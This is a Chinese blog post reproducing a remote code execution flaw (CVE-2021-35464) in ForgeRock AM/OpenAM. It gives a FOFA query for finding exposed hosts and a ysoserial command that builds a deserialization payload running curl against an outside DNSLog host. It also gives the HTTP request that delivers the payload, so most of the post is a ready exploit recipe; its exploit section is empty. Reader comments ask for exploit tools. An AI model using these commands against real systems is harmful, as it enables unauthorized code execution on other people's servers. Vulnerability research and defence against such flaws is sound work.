ForgeRock AM远程代码执行漏洞(CVE-2021-35464)漏洞复现

置顶 MD@@nr丫卡uer

于 2021-07-02 16:30:25 发布

阅读量2.3k

点赞数 2

文章标签：安全

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/weixin_44146996/article/details/118418676

版权

在这里插入图片描述

文章目录

fofa搜索语句

app="OpenAM"

漏洞复现

poc（DNSLog检测）

https://github.com/frohoff/ysoserial
使用工具生成payload

java -jar ysoserial.jar Click1 "curl http://ykmvp3.dnslog.cn" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '='

在这里插入图片描述

数据包如下

GET /openam/oauth2/..;/ccversion/Version?jato.pageSession=<serialized_object> HTTP/1.1
Host: xxxx.xxxx.xxxx.xxxx
Connection: close

<serialized_object>为生成的payload
在这里插入图片描述

EXP

MD@@nr丫卡uer

关注

2
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
ForgeRock AM远程代码执行漏洞(CVE-2021-35464)漏洞复现

文章目录fofa搜索语句漏洞复现poc（DNSLog检测）EXPfofa搜索语句app="OpenAM"漏洞复现poc（DNSLog检测）https://github.com/frohoff/ysoserial使用工具生成payloadjava -jar ysoserial.jar Click1 "curl http://ykmvp3.dnslog.cn" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '.
复制链接

扫一扫

MD@@nr丫卡uer CSDN认证博客专家 CSDN认证企业博客

码龄6年

34: 原创

73万+: 周排名

61万+: 总排名

6万+: 访问

: 等级

400: 积分

46: 粉丝

14: 获赞

28: 评论

53: 收藏

私信

关注

热门文章

最新评论

Kioptrix 2014 (#5)
Jackyenq: 请教一下师傅再使用msf这一步是否采用了什么替换user agent的操作，我设置的payload和exp和师傅博客里面完全一致但是一直是Exploit completed, but no session was created.
XenMobile目录遍历任意文件读取(CVE-2020-8209)
激活llx: 你好，想搭建靶机的话，怎么下载对应版本的xenMobile server呢？在各种地方都找不到可以研究的版本了。
致远OA-ajax.do任意文件上传漏洞
@A1: 楼主那个生成payload的工具可以分享下嘛
Vmware vcenter未授权任意文件上传漏洞(CVE-2021-21972)
F0R只会弱口令: 会不会误报啊
致远OA-ajax.do任意文件上传漏洞
JY_Heart: 楼主， message显示表达式不正确，请检查表达式是什么原因呢

您愿意向朋友推荐“博客详情页”吗？

强烈不推荐
不推荐
一般般
推荐
强烈推荐

提交

最新文章

目录

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。